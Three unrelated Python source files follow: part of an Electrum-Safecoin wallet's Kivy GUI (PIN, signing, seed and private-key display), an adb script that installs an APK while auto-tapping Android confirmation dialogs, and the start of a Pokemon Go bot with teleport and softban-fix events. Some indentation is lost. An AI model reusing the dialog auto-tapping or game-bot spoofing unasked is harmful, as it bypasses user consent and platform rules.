        if wallet.has_password():
            # A cancelled/failed PIN entry stops the whole app.
            self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
        else:
            self.load_wallet(wallet)
    else:
        Logger.debug('Electrum-Safecoin: Wallet not found. Launching install wizard')
        storage = WalletStorage(path)
        wizard = Factory.InstallWizard(self.electrum_config, storage)
        wizard.bind(on_wizard_complete=self.on_wizard_complete)
        action = wizard.storage.get_action()
        wizard.run(action)
def on_stop(self):
    """Kivy shutdown hook: detach the wallet cleanly."""
    Logger.info('on_stop')
    self.stop_wallet()
def stop_wallet(self):
    """Detach the current wallet from the daemon and forget it."""
    wallet = self.wallet
    if not wallet:
        return
    self.daemon.stop_wallet(wallet.storage.path)
    self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
    """Desktop keyboard shortcuts; everything is behind Ctrl."""
    if 'ctrl' in modifiers:
        # q=24 w=25
        if keycode in (24, 25):
            # Ctrl+Q / Ctrl+W: quit
            self.stop()
        elif keycode == 27:
            # r=27
            # force update wallet
            self.update_wallet()
        elif keycode == 112:
            # pageup
            #TODO move to next tab
            pass
        elif keycode == 117:
            # pagedown
            #TODO move to prev tab
            pass
    #TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
    """Hardware keys: back (27) needs a double press to exit; the Android
    settings key is swallowed."""
    if key == 27 and self.is_exit is False:
        # First back press: warn instead of exiting.
        self.is_exit = True
        self.show_info(_('Press again to exit'))
        return True
    # override settings button
    if key in (319, 282):  # f1/settings button on android
        #self.gui.main_gui.toggle_settings(self)
        return True
def settings_dialog(self):
    """Open (and lazily create) the settings dialog."""
    from .uix.dialogs.settings import SettingsDialog
    if self._settings_dialog is None:
        self._settings_dialog = SettingsDialog(self)
    self._settings_dialog.update()
    self._settings_dialog.open()
def popup_dialog(self, name):
    """Open a popup by name: special-cased dialogs, else a kv file of that name."""
    if name == 'settings':
        self.settings_dialog()
    elif name == 'wallets':
        from .uix.dialogs.wallets import WalletDialog
        d = WalletDialog()
        d.open()
    else:
        popup = Builder.load_file('gui/kivy/uix/ui_screens/' + name + '.kv')
        popup.open()
@profiler
def init_ui(self):
    ''' Initialize The Ux part of electrum. This function performs the basic
    tasks of setting up the ui.
    '''
    #from weakref import ref
    self.funds_error = False
    # setup UX
    self.screens = {}
    #setup lazy imports for mainscreen
    Factory.register('AnimatedPopup',
                     module='electrum_safecoin_gui.kivy.uix.dialogs')
    Factory.register('QRCodeWidget',
                     module='electrum_safecoin_gui.kivy.uix.qrcodewidget')
    # preload widgets. Remove this if you want to load the widgets on demand
    #Cache.append('electrum_safecoin_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
    #Cache.append('electrum_safecoin_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
    # load and focus the ui
    self.root.manager = self.root.ids['manager']
    # Screens are created lazily by switch_to().
    self.history_screen = None
    self.contacts_screen = None
    self.send_screen = None
    self.invoices_screen = None
    self.receive_screen = None
    self.requests_screen = None
    self.address_screen = None
    self.icon = "icons/electrum-safecoin.png"
    self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
    """Refresh node/chain counters after an 'interfaces' network event."""
    self.num_nodes = len(self.network.get_interfaces())
    self.num_chains = len(self.network.get_blockchains())
    chain = self.network.blockchain()
    self.blockchain_checkpoint = chain.get_checkpoint()
    self.blockchain_name = chain.get_name()
    if self.network.interface:
        self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
    """Network-thread callback; fans events out to throttled UI triggers."""
    Logger.info('network event: ' + event)
    if event == 'interfaces':
        self._trigger_update_interfaces()
    elif event == 'updated':
        self._trigger_update_wallet()
        self._trigger_update_status()
    elif event == 'status':
        self._trigger_update_status()
    elif event == 'new_transaction':
        self._trigger_update_wallet()
    elif event == 'verified':
        self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
    """Make *wallet* the active wallet and refresh the whole UI."""
    if self.wallet:
        self.stop_wallet()
    self.wallet = wallet
    self.update_wallet()
    # Once GUI has been initialized check if we want to announce something
    # since the callback has been called before the GUI was initialized
    if self.receive_screen:
        self.receive_screen.clear()
    self.update_tabs()
    run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
    """Recompute the status line and the balance labels.

    Fixed: the old code read ``self.network.get_local_height()`` before
    its own ``self.network is None`` check, crashing in offline mode.
    """
    if self.network:
        self.num_blocks = self.network.get_local_height()
    if not self.wallet:
        self.status = _("No Wallet")
        return
    if self.network is None or not self.network.is_running():
        status = _("Offline")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        server_lag = self.network.get_local_height() - server_height
        if not self.wallet.up_to_date or server_height == 0:
            status = _("Synchronizing...")
        elif server_lag > 1:
            status = _("Server lagging")
        else:
            status = ''
    else:
        status = _("Disconnected")
    self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]' % status if status else '')
    # balance: confirmed + unconfirmed + unmatured
    c, u, x = self.wallet.get_balance()
    text = self.format_amount(c + x + u)
    self.balance = str(text.strip()) + ' [size=22dp]%s[/size]' % self.base_unit
    self.fiat_balance = self.fx.format_amount(c + u + x) + ' [size=22dp]%s[/size]' % self.fx.ccy
def get_max_amount(self):
    """Amount string for spending all available coins ('' when none)."""
    inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
    if not inputs:
        return ''
    addr = self.send_screen.screen.address
    # str(None) is the truthy string 'None', so the old
    # ``str(addr) or dummy`` fallback never triggered for a missing address.
    addr = str(addr) if addr else self.wallet.dummy_address()
    outputs = [(TYPE_ADDRESS, addr, '!')]
    tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
    amount = tx.output_value()
    return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
    """Format a satoshi amount in the current base unit (no unit suffix)."""
    return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
    """Format a satoshi amount and append the base-unit symbol."""
    return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
    """Schedule a status refresh and, when safe, redraw all tabs."""
    self._trigger_update_status()
    if not self.wallet:
        return
    offline = not self.network or not self.network.is_connected()
    if self.wallet.up_to_date or offline:
        self.update_tabs()
def notify(self, message):
    """Best-effort desktop/mobile notification via plyer."""
    try:
        global notification, os
        if not notification:
            from plyer import notification
        icon = (os.path.dirname(os.path.realpath(__file__))
                + '/../../' + self.icon)
        notification.notify('Electrum-Safecoin', message,
                            app_icon=icon, app_name='Electrum')
    except ImportError:
        # Kivy's Logger has no ``Error`` attribute: the old call
        # ``Logger.Error(...)`` raised AttributeError inside this handler.
        Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
    """App going to background: remember when, and suspend NFC."""
    self.pause_time = time.time()
    # pause nfc
    scanner = self.nfcscanner
    if scanner:
        scanner.nfc_disable()
    return True
def on_resume(self):
    """App returning to foreground: re-lock after >60s away, re-enable NFC.

    Fixed: the old code tested ``self.wallet.has_password`` without
    calling it — a bound method is always truthy, so the PIN prompt
    depended only on the pause duration. Also guards against no wallet
    being loaded at all.
    """
    now = time.time()
    if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
        self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
    if self.nfcscanner:
        self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
    """Window resize hook: derive orientation and phone/tablet mode."""
    width, height = value
    self._orientation = 'landscape' if width > height else 'portrait'
    # Short edge longer than 3.51 inch counts as a tablet.
    self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
    """First tap copies the label's data; second tap shows it as a QR code."""
    if label.touched:
        label.touched = False
        self.qr_dialog(label.name, label.data, True)
    else:
        label.touched = True
        self._clipboard.copy(label.data)
        Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
    """Forward prefilled payment fields to the send machinery."""
    self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
               exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
               modal=False):
    ''' Show an error Message Bubble.
    '''
    self.show_info_bubble(text=error, icon=icon, width=width,
                          pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
                          duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
              exit=False, duration=0, modal=False):
    ''' Show an Info Message Bubble.
    '''
    # Same machinery as show_error, just a different icon.
    self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
                    duration=duration, modal=modal, exit=exit, pos=pos,
                    arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
                     arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
    '''Method to show an Information Bubble
    .. parameters::
        text: Message to be displayed
        pos: position for the bubble
        duration: duration the bubble remains on screen. 0 = click to hide
        width: width of the Bubble
        arrow_pos: arrow position for the bubble
    '''
    # A single InfoBubble instance is reused for every message.
    info_bubble = self.info_bubble
    if not info_bubble:
        info_bubble = self.info_bubble = Factory.InfoBubble()
    win = Window
    if info_bubble.parent:
        # Already shown: detach it (or its modal wrapper) before reuse.
        win.remove_widget(info_bubble
                          if not info_bubble.modal else
                          info_bubble._modal_view)
    if not arrow_pos:
        info_bubble.show_arrow = False
    else:
        info_bubble.show_arrow = True
        info_bubble.arrow_pos = arrow_pos
    img = info_bubble.ids.img
    if text == 'texture':
        # icon holds a texture not a source image
        # display the texture in full screen
        text = ''
        img.texture = icon
        info_bubble.fs = True
        info_bubble.show_arrow = False
        img.allow_stretch = True
        info_bubble.dim_background = True
        info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
    else:
        info_bubble.fs = False
        info_bubble.icon = icon
        #if img.texture and img._coreimage:
        #    img.reload()
        img.allow_stretch = False
        info_bubble.dim_background = False
        info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
    info_bubble.message = text
    if not pos:
        pos = (win.center[0], win.center[1] - (info_bubble.height/2))
    info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
    """Open the transaction-details dialog for *tx*."""
    from .uix.dialogs.tx_dialog import TxDialog
    d = TxDialog(self, tx)
    d.open()
def sign_tx(self, *args):
    """Sign in a background thread; args = (tx, password, on_success, on_failure)."""
    threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
    # Worker thread: report back on the UI thread via Clock.
    try:
        self.wallet.sign_transaction(tx, password)
    except InvalidPassword:
        Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
        return
    Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
    # Worker thread: network call, then marshal the result to the UI thread.
    ok, txid = self.network.broadcast(tx)
    Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
    """Broadcast *tx*; when *pr* is given, mark that invoice paid on success."""
    def on_complete(ok, msg):
        if ok:
            self.show_info(_('Payment sent.'))
            if self.send_screen:
                self.send_screen.do_clear()
            if pr:
                self.wallet.invoices.set_paid(pr, tx.txid())
                self.wallet.invoices.save()
                self.update_tab('invoices')
        else:
            self.show_error(msg)
    if self.network and self.network.is_connected():
        self.show_info(_('Sending'))
        threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
    else:
        self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
    """Edit the payment description of *screen* via a LabelDialog."""
    from .uix.dialogs.label_dialog import LabelDialog
    text = screen.message
    def callback(text):
        screen.message = text
    d = LabelDialog(_('Enter description'), text, callback)
    d.open()
def amount_dialog(self, screen, show_max):
    """Open the amount keypad for *screen* (optionally with a Max button)."""
    from .uix.dialogs.amount_dialog import AmountDialog
    amount = screen.amount
    if amount:
        # Strip the unit suffix before editing.
        amount, u = str(amount).split()
        assert u == self.base_unit
    def cb(amount):
        screen.amount = amount
    popup = AmountDialog(show_max, amount, cb)
    popup.open()
def invoices_dialog(self, screen):
    """List saved invoices, or explain where they come from when none exist."""
    from .uix.dialogs.invoices import InvoicesDialog
    if len(self.wallet.invoices.sorted_list()) == 0:
        self.show_info(' '.join([
            _('No saved invoices.'),
            _('Signed invoices are saved automatically when you scan them.'),
            _('You may also save unsigned requests or contact addresses using the save button.')
        ]))
        return
    popup = InvoicesDialog(self, screen, None)
    popup.update()
    popup.open()
def requests_dialog(self, screen):
    """List saved payment requests."""
    from .uix.dialogs.requests import RequestsDialog
    if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
        self.show_info(_('No saved requests.'))
        return
    popup = RequestsDialog(self, screen, None)
    popup.update()
    popup.open()
def addresses_dialog(self, screen):
    """Browse the wallet's addresses."""
    from .uix.dialogs.addresses import AddressesDialog
    popup = AddressesDialog(self, screen, None)
    popup.update()
    popup.open()
def fee_dialog(self, label, dt):
    """Open the fee settings dialog; refresh the cached fee status on change."""
    from .uix.dialogs.fee_dialog import FeeDialog
    def cb():
        self.fee_status = self.electrum_config.get_fee_status()
    fee_dialog = FeeDialog(self, self.electrum_config, cb)
    fee_dialog.open()
def on_fee(self, event, *arg):
    # Network 'fee' callback: keep the cached fee status current.
    self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
    """Run ``f(*args, password)``, prompting for the PIN first when the
    wallet has one (password is None otherwise)."""
    if not self.wallet.has_password():
        f(*(args + (None,)))
        return
    def on_success(pw):
        f(*(args + (pw,)))
    self.password_dialog(self.wallet, msg, on_success, lambda: None)
def delete_wallet(self):
    """Ask for confirmation before deleting the current wallet file."""
    from .uix.dialogs.question import Question
    basename = os.path.basename(self.wallet.storage.path)
    d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
    d.open()
def _delete_wallet(self, b):
    # Question callback: b is truthy when the user confirmed.
    if b:
        basename = self.wallet.basename()
        self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
    """PIN-confirmed deletion of the current wallet file, then fall back
    to (re)loading 'default_wallet' in the same directory."""
    wallet_path = self.get_wallet_path()
    dirname = os.path.dirname(wallet_path)
    basename = os.path.basename(wallet_path)
    if self.wallet.has_password():
        try:
            self.wallet.check_password(pw)
        except Exception:
            # narrow from a bare ``except:``; wrong-PIN errors land here
            self.show_error("Invalid PIN")
            return
    self.stop_wallet()
    os.unlink(wallet_path)
    self.show_error("Wallet removed:" + basename)
    # The old code also did an unused ``os.listdir(dirname)`` here.
    new_path = os.path.join(dirname, 'default_wallet')
    self.load_wallet_by_name(new_path)
def show_seed(self, label):
    """Ask for the PIN, then reveal the wallet seed in *label*."""
    self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
    """Decrypt and display the seed (and passphrase, if any)."""
    if self.wallet.has_password() and password is None:
        return
    keystore = self.wallet.keystore
    try:
        seed = keystore.get_seed(password)
        passphrase = keystore.get_passphrase(password)
    except Exception:
        # narrow from a bare ``except:`` (bad PIN / decryption failure)
        self.show_error("Invalid PIN")
        return
    label.text = _('Seed') + ':\n' + seed
    if passphrase:
        label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
    """Show the (cached) PIN entry dialog for *wallet*."""
    from .uix.dialogs.password_dialog import PasswordDialog
    if self._password_dialog is None:
        self._password_dialog = PasswordDialog()
    self._password_dialog.init(self, wallet, msg, on_success, on_failure)
    self._password_dialog.open()
def change_password(self, cb):
    """Run the change-PIN flow on the current wallet."""
    from .uix.dialogs.password_dialog import PasswordDialog
    if self._password_dialog is None:
        self._password_dialog = PasswordDialog()
    message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
    def on_success(old_password, new_password):
        self.wallet.update_password(old_password, new_password)
        self.show_info(_("Your PIN code was updated"))
    on_failure = lambda: self.show_error(_("PIN codes do not match"))
    self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
    self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
    """After PIN confirmation, put the private key for *addr* into *pk_label*."""
    if self.wallet.is_watching_only():
        self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
        return
    def show_private_key(addr, pk_label, password):
        # Runs via protected(): password is the confirmed PIN (or None).
        if self.wallet.has_password() and password is None:
            return
        if not self.wallet.can_export():
            return
        try:
            key = str(self.wallet.export_private_key(addr, password)[0])
            pk_label.data = key
        except InvalidPassword:
            self.show_error("Invalid PIN")
            return
    self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
installApp.py | # -*- coding: utf-8 -*-
__author__ = 'joko'
"""
@author:joko
@time: 16/11/11 上午10:52
"""
import lib.adbUtils
import xml.etree.cElementTree as ET
import re
import lib.Utils as U
import threading
from multiprocessing import Queue
import os
class Ia:
    """Install an APK on a device while a watcher thread keeps dismissing
    the system's permission/confirmation dialogs by tapping their buttons."""
    def __init__(self, all_result_path, device):
        """
        The multiprocessing Queue is used for inter-thread signalling
        (installer thread -> watcher thread).
        :param all_result_path: directory created for this test run
        :param device: device id
        """
        self.all_result_path = all_result_path
        self.device = device
        self.adb = lib.adbUtils.ADB(self.device)
        self.queue = Queue(10)
    @U.l()
    def __uidump(self):
        """
        Dump the control tree of the current Activity.
        :return: path of the xml file stored on the host machine
        """
        save_path = self.all_result_path + "/dump.xml"
        self.adb.get_focused_package_xml(save_path)
        return save_path
    @U.l()
    def __element(self):
        """
        Find the first known confirm/allow button in the dumped tree and
        return the centre of its bounds as a coordinate tuple.
        button_list: resource-ids of common confirm/allow/install buttons
        """
        button0 = 'com.android.packageinstaller:id/ok_button'
        button1 = 'com.android.packageinstaller:id/btn_allow_once'
        button2 = 'com.android.packageinstaller:id/bottom_button_two'
        button3 = 'com.android.packageinstaller:id/btn_continue_install'
        button4 = 'android:id/button1'
        button5 = 'vivo:id/vivo_adb_install_ok_button'
        button_list = [button0, button1, button2, button3, button4, button5]
        self.__uidump()
        self.pattern = re.compile(r"\d+")
        if not os.path.exists(self.all_result_path + "/dump.xml"):
            U.Logging.warn('Failed to get xml')
            return None
        tree = ET.ElementTree(file=self.all_result_path + "/dump.xml")
        tree_iter = tree.iter(tag="node")
        for elem in tree_iter:
            if elem.attrib["resource-id"] in button_list:
                # bounds look like "[x1,y1][x2,y2]" — compute the centre point
                bounds = elem.attrib["bounds"]
                coord = self.pattern.findall(bounds)
                x_point = (int(coord[2]) - int(coord[0])) / 2.0 + int(coord[0])
                y_point = (int(coord[3]) - int(coord[1])) / 2.0 + int(coord[1])
                return x_point, y_point
        else:
            # for/else: loop finished without finding a known button
            return None
    def tap(self):
        """
        Perform one tap on the detected button, if any.
        :return:
        """
        coordinate_points = self.__element()
        if coordinate_points is not None:
            self.adb.touch_by_element(coordinate_points)
    def tap_all(self):
        """
        Keep dumping the UI and tapping; meant to run in a worker thread
        until the installer thread signals completion via the queue.
        :return:
        """
        while True:
            self.tap()
            if not self.queue.empty():
                break
    @U.l()
    def __install_app(self, package_name, app_file_path):
        """
        :param package_name: application package name, e.g. com.x.x
        :param app_file_path: path of the APK — must be absolute
        :return:
        """
        self.adb.quit_app(
            'com.android.packageinstaller')  # kill the installer UI; works around an OPPO bug
        if self.queue.empty():
            if self.adb.is_install(package_name):
                # Remove any previously installed copy first.
                U.Logging.success(
                    'del {}-{}'.format(self.device, package_name))
                self.adb.remove_app(package_name)
            install_num = 0
            while install_num < 4:
                install_info = self.adb.install_app(app_file_path).stdout.readlines()
                U.Logging.success('install_info:%s' % install_info)
                if self.adb.is_install(package_name):
                    # Success: signal tap_all() to stop watching.
                    self.queue.put(1)
                    break
                else:
                    U.Logging.error('Reinstalling %s %s ' % (package_name, self.device))
                    install_num += 1
            else:
                # while/else: four failed attempts — give up
                raise AssertionError('Reinstalling app error')
        # kill the installer UI; works around an OPPO bug
        self.adb.quit_app('com.android.packageinstaller')
    def main(self):
        """
        Start two threads:
        thread 1 installs the application;
        thread 2 watches the screen for clickable confirmation buttons.
        :return:
        """
        ini = U.ConfigIni()
        install_file = ini.get_ini('test_install_path', 'path')
        package_name = ini.get_ini('test_package_name', 'package_name')
        threads = []
        click_button = threading.Thread(target=self.tap_all, args=())
        threads.append(click_button)
        install_app = threading.Thread(
            target=self.__install_app, args=(
                package_name, install_file))
        threads.append(install_app)
        process_list = range(len(threads))
        for i in process_list:
            threads[i].start()
        for i in process_list:
            threads[i].join()
        # Clean up the UI dumps left on the device.
        self.adb.shell('"rm -r /data/local/tmp/*.xml"')
if __name__ == '__main__':
    # Ad-hoc manual run with a hard-coded result directory and device id.
    a = Ia('/Users/joko/Desktop/temp', 'VGAMCQEI99999999')
    a.main()
|
__init__.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import json
import logging
import os
import random
import re
import sys
import time
import Queue
import threading
from geopy.geocoders import GoogleV3
from pgoapi import PGoApi
from pgoapi.utilities import f2i, get_cell_ids
import cell_workers
from base_task import BaseTask
from plugin_loader import PluginLoader
from api_wrapper import ApiWrapper
from cell_workers.utils import distance
from event_manager import EventManager
from human_behaviour import sleep
from item_list import Item
from metrics import Metrics
from pokemongo_bot.event_handlers import LoggingHandler, SocketIoHandler, ColoredLoggingHandler
from pokemongo_bot.socketio_server.runner import SocketIoRunner
from pokemongo_bot.websocket_remote_control import WebsocketRemoteControl
from pokemongo_bot.base_dir import _base_dir
from worker_result import WorkerResult
from tree_config_builder import ConfigException, MismatchTaskApiVersion, TreeConfigBuilder
from inventory import init_inventory
from sys import platform as _platform
import struct
class PokemonGoBot(object):
@property
def position(self):
    # (lat, lng, alt) — altitude is always reported as 0 here.
    return self.api._position_lat, self.api._position_lng, 0
@position.setter
def position(self, position_tuple):
    # Expects a (lat, lng, alt) tuple; writes straight into the API client.
    self.api._position_lat, self.api._position_lng, self.api._position_alt = position_tuple
@property
def player_data(self):
    """
    Returns the player data as received from the API.
    :return: The player data.
    :rtype: dict
    """
    return self._player
def __init__(self, config):
    """Initialise bot state from *config* and start the web-update thread."""
    self.config = config
    self.fort_timeouts = dict()
    # Static game data shipped with the bot.
    self.pokemon_list = json.load(
        open(os.path.join(_base_dir, 'data', 'pokemon.json'))
    )
    self.item_list = json.load(open(os.path.join(_base_dir, 'data', 'items.json')))
    self.metrics = Metrics(self)
    self.latest_inventory = None
    self.cell = None
    self.recent_forts = [None] * config.forts_max_circle_size
    self.tick_count = 0
    self.softban = False
    self.start_position = None
    self.last_map_object = None
    self.last_time_map_object = 0
    self.logger = logging.getLogger(type(self).__name__)
    # Make our own copy of the workers for this instance
    self.workers = []
    # Threading setup for file writing
    self.web_update_queue = Queue.Queue(maxsize=1)
    self.web_update_thread = threading.Thread(target=self.update_web_location_worker)
    self.web_update_thread.start()
def start(self):
    """Wire up events, logging and the API client; seed the RNG."""
    self._setup_event_system()
    self._setup_logging()
    self._setup_api()
    random.seed()
def _setup_event_system(self):
    """Build the EventManager with logging and optional websocket handlers."""
    handlers = []
    if self.config.logging_color:
        handlers.append(ColoredLoggingHandler())
    else:
        handlers.append(LoggingHandler())
    if self.config.websocket_server_url:
        if self.config.websocket_start_embedded_server:
            self.sio_runner = SocketIoRunner(self.config.websocket_server_url)
            self.sio_runner.start_listening_async()
        websocket_handler = SocketIoHandler(
            self,
            self.config.websocket_server_url
        )
        handlers.append(websocket_handler)
        if self.config.websocket_remote_control:
            remote_control = WebsocketRemoteControl(self).start()
    self.event_manager = EventManager(*handlers)
    self._register_events()
    if self.config.show_events:
        # --show-events mode: dump the registered events and exit.
        self.event_manager.event_report()
        sys.exit(1)
    # Registering event:
    # self.event_manager.register_event("location", parameters=['lat', 'lng'])
    #
    # Emitting event should be enough to add logging and send websocket
    # message: :
    # self.event_manager.emit('location', 'level'='info', data={'lat': 1, 'lng':1}),
def _register_events(self):
self.event_manager.register_event(
'location_found',
parameters=('position', 'location')
)
self.event_manager.register_event('api_error')
self.event_manager.register_event('config_error')
self.event_manager.register_event('login_started')
self.event_manager.register_event('login_failed')
self.event_manager.register_event('login_successful')
self.event_manager.register_event('set_start_location')
self.event_manager.register_event('load_cached_location')
self.event_manager.register_event('location_cache_ignored')
self.event_manager.register_event(
'position_update',
parameters=(
'current_position',
'last_position',
'distance', # optional
'distance_unit' # optional
)
)
self.event_manager.register_event('location_cache_error')
self.event_manager.register_event('bot_start')
self.event_manager.register_event('bot_exit')
# sleep stuff
self.event_manager.register_event(
'next_sleep',
parameters=('time',)
)
self.event_manager.register_event(
'bot_sleep',
parameters=('time_in_seconds',)
)
# fort stuff
self.event_manager.register_event(
'spun_fort',
parameters=(
'fort_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'lured_pokemon_found',
parameters=(
'fort_id',
'fort_name',
'encounter_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'moving_to_fort',
parameters=(
'fort_name',
'distance',
'current_position'
)
)
self.event_manager.register_event(
'moving_to_lured_fort',
parameters=(
'fort_name',
'distance',
'lure_distance',
'current_position'
)
)
self.event_manager.register_event(
'spun_pokestop',
parameters=(
'pokestop', 'exp', 'items'
)
)
self.event_manager.register_event(
'pokestop_empty',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_out_of_range',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_on_cooldown',
parameters=('pokestop', 'minutes_left')
)
self.event_manager.register_event(
'unknown_spin_result',
parameters=('status_code',)
)
self.event_manager.register_event('pokestop_searching_too_often')
self.event_manager.register_event(
'arrived_at_fort',
parameters=(
'current_position'
)
)
# pokemon stuff
self.event_manager.register_event(
'catchable_pokemon',
parameters=(
'pokemon_id',
'spawn_point_id',
'encounter_id',
'latitude',
'longitude',
'expiration_timestamp_ms'
)
)
self.event_manager.register_event(
'pokemon_appeared',
parameters=(
'pokemon',
'cp',
'iv',
'iv_display',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('no_pokeballs')
self.event_manager.register_event(
'pokemon_catch_rate',
parameters=(
'catch_rate',
'ball_name',
'berry_name',
'berry_count'
)
)
self.event_manager.register_event(
'threw_berry',
parameters=(
'berry_name',
'ball_name',
'new_catch_rate'
)
)
self.event_manager.register_event(
'threw_pokeball',
parameters=(
'ball_name',
'success_percentage',
'count_left'
)
)
self.event_manager.register_event(
'pokemon_capture_failed',
parameters=('pokemon',)
)
self.event_manager.register_event(
'pokemon_vanished',
parameters=(
'pokemon',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('pokemon_not_in_range')
self.event_manager.register_event('pokemon_inventory_full')
self.event_manager.register_event(
'pokemon_caught',
parameters=(
'pokemon',
'cp', 'iv', 'iv_display', 'exp',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event(
'pokemon_evolved',
parameters=('pokemon', 'iv', 'cp')
)
self.event_manager.register_event('skip_evolve')
self.event_manager.register_event('threw_berry_failed', parameters=('status_code',))
self.event_manager.register_event('vip_pokemon')
self.event_manager.register_event('gained_candy', parameters=('quantity', 'type'))
# level up stuff
self.event_manager.register_event(
'level_up',
parameters=(
'previous_level',
'current_level'
)
)
self.event_manager.register_event(
'level_up_reward',
parameters=('items',)
)
# lucky egg
self.event_manager.register_event(
'used_lucky_egg',
parameters=('amount_left',)
)
self.event_manager.register_event('lucky_egg_error')
# softban
self.event_manager.register_event('softban')
self.event_manager.register_event('softban_fix')
self.event_manager.register_event('softban_fix_done')
# egg incubating
self.event_manager.register_event(
'incubate_try',
parameters=(
'incubator_id',
'egg_id'
)
)
self.event_manager.register_event(
'incubate',
parameters=('distance_in_km',)
)
self.event_manager.register_event(
'next_egg_incubates',
parameters=('distance_in_km',)
)
self.event_manager.register_event('incubator_already_used')
self.event_manager.register_event('egg_already_incubating')
self.event_manager.register_event(
'egg_hatched',
parameters=(
'pokemon',
'cp', 'iv', 'exp', 'stardust', 'candy'
)
)
# discard item
self.event_manager.register_event(
'item_discarded',
parameters=(
'amount', 'item', 'maximum'
)
)
self.event_manager.register_event(
'item_discard_skipped',
parameters=('space',)
)
self.event_manager.register_event(
'item_discard_fail',
parameters=('item',)
)
# inventory
self.event_manager.register_event('inventory_full')
# release
self.event_manager.register_event(
'keep_best_release',
parameters=(
'amount', 'pokemon', 'criteria'
)
)
self.event_manager.register_event(
'future_pokemon_release',
parameters=(
'pokemon', 'cp', 'iv', 'below_iv', 'below_cp', 'cp_iv_logic'
)
)
self.event_manager.register_event(
'pokemon_release',
parameters=('pokemon', 'cp', 'iv')
)
# polyline walker
self.event_manager.register_event(
'polyline_request',
parameters=('url',)
)
# cluster
self.event_manager.register_event(
'found_cluster',
parameters=(
'num_points', 'forts', 'radius', 'distance'
)
)
self.event_manager.register_event(
'arrived_at_cluster',
parameters=(
'forts', 'radius'
)
)
# rename
self.event_manager.register_event(
'rename_pokemon',
parameters=(
'old_name', 'current_name'
)
)
self.event_manager.register_event(
'pokemon_nickname_invalid',
parameters=('nickname',)
)
self.event_manager.register_event('unset_pokemon_nickname')
# Move To map pokemon
self.event_manager.register_event(
'move_to_map_pokemon_fail',
parameters=('message',)
)
self.event_manager.register_event(
'move_to_map_pokemon_updated_map',
parameters=('lat', 'lon')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_to',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_encounter',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_move_towards',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
